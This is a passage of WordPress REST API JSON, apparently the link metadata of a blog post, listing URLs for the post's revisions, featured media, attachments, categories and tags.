uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/274\/revisions\/760"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/media\/305"}],"wp:attachment":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=274"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}